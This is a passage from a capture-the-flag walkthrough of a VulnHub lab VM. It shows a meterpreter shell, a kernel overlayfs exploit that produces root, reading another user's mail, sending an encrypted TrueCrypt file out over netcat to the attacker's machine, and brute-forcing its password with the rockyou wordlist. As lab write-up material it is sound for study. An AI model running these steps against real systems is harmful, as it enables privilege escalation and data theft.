Now that we know the OS and kernel version, we can quickly search https://www.kernel-exploits.com/ for a suitable exploit. In this case, the overlayfs exploit should do the trick and can be downloaded here.

  • meterpreter > shell
Process 30295 created.
Channel 0 created.
  • pwd
/tmp
  • ./ofs_64.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
  • # whoami
root

Interesting Email

Now that we’re “root”, we should probably look for that flag. From here I quickly discovered some interesting email under /var/log/mail…

  • # cd /var
  • # ls
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
www
  • # cd backups
  • # cd ../mail
  • # ls
www-data
  • # cat www-data
From Dave <[email protected]> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <[email protected]>
Subject: rockyou with a nice hat!
Message-ID: <[email protected]>
X-IMAP: 0080081351 0000002016l
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
# 
</[email protected]></[email protected]>

Interesting File

After getting “root” on the box, I quickly discovered the TrueCrypt volume (/root/dave.tc) and transfered it back to my Kali box using netcat to analyze further…

# pwd
/root/
# ls
dave.tc
# nc -lvvp 4444 < dave.tc
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.1.60] port 4444 [tcp/*] accepted (family 2, sport 54838)
# ls
dave.tc
# 

Brute Forcing TrueCrypt Volumes

Since we know the TrueCrypt volume is encrypted and password protected, we’ll need a program to attempt a dictionary attack with and we’ll use the rockyou.txt wordlist as our dictionary… For this, I chose OTFBrutusGUI which can be downloaded here.

Mounting the TrueCrypt Volume

Now that we have the password for the volume, we should be able to install and mount the volume from our Kali box. NOTE: You’ll need to install truecrypt first for this to work… obviously!

Capturing the Flag

Now that our TrueCrypt volume is mounted, we can quickly navigate the directory structure and have no problems finding our flag.txt hiding in a hidden directory.

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare